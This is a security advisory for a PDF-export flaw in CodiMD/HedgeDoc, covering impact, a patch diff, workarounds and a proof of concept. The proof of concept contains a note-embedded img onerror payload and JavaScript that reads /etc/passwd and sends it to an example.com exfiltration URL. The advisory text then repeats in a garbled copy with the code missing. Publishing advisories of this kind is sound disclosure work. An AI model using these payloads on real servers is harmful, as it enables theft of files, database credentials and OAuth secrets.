Impact
An attacker is able to receive arbitrary files from the file system when exporting a note to PDF. Since the code injection has to take place as note content, there fore this exploit requires the attackers ability to modify a note.
This will affect all instances, which have pdf export enabled.
Patches
--- a/lib/config/index.js
+++ b/lib/config/index.js
@@ -189,6 +189,12 @@ switch (config.imageUploadType) {
]
}
+// Disable PDF export due to security issue
+if (config.allowPDFExport) {
+ config.allowPDFExport = false
+ logger.warn('PDF export was disabled for this release to mitigate a critical security issue. This feature will hopefully become available again in future releases.')
+}
+
// generate correct path
config.sslCAPath.forEach(function (capath, i, array) {
array[i] = path.resolve(appRootPath, capath)
Fixed in c178947
Was fixed in 1.5.0
Workarounds
Start the CodiMD/HedgeDoc instance with CMD_ALLOW_PDF_EXPORT=false or set "allowPDFExport": false in config.json.
Proof of Concept
- Deploy a malicious JavaScript file to a server. For demonstration
purposes the script uses the domain example.com.
function reqListener () {
var encoded = encodeURI(this.responseText);
var b64 = btoa(this.responseText);
var raw = this.responseText;
document.write('<iframe
src="http://example.com/exfil?data='+b64+'"></iframe>');
}
var oReq = new XMLHttpRequest();
oReq.addEventListener("load", reqListener);
oReq.open("GET", "file:///etc/passwd");
oReq.send();
- Create a new note in CodiMD/HedgeDoc, containing:
<img src="something_not_found" onerror="document.write('<script
src=http://example.com/path_to_malicious_script.js></script>')"/>
-
Use export PDF function.
-
Read the exfiltrated data in base64 from your server access log.
Further analysis
This works because while PhantomJS doesn't actually render the file:///
references to the PDF file itself, it still uses them internally, and
exfiltration is possible, and easy through JavaScript rendering.
The impact is pretty bad, as the attacker is able to read the CodiMD/HedgeDoc
config.json file as well any other files on the filesystem. Even though
the suggested Docker deploy option doesn't have many interesting files
itself, the config.json still often contains sensitive information -
database credentials, and maybe OAuth secrets among other things.
For more information
If you have any questions or comments about this advisory:
joohoi Analyst
Impact
An attacker is able to receive arbitrary files from the file system when exporting a note to PDF. Since the code injection has to take place as note content, there fore this exploit requires the attackers ability to modify a note.
This will affect all instances, which have pdf export enabled.
Patches
Fixed in c178947
Was fixed in 1.5.0
Workarounds
Start the CodiMD/HedgeDoc instance with
CMD_ALLOW_PDF_EXPORT=falseor set"allowPDFExport": falsein config.json.Proof of Concept
purposes the script uses the domain
example.com.Use export PDF function.
Read the exfiltrated data in base64 from your server access log.
Further analysis
This works because while PhantomJS doesn't actually render the
file:///references to the PDF file itself, it still uses them internally, and
exfiltration is possible, and easy through JavaScript rendering.
The impact is pretty bad, as the attacker is able to read the CodiMD/HedgeDoc
config.jsonfile as well any other files on the filesystem. Even thoughthe suggested Docker deploy option doesn't have many interesting files
itself, the
config.jsonstill often contains sensitive information -database credentials, and maybe OAuth secrets among other things.
For more information
If you have any questions or comments about this advisory: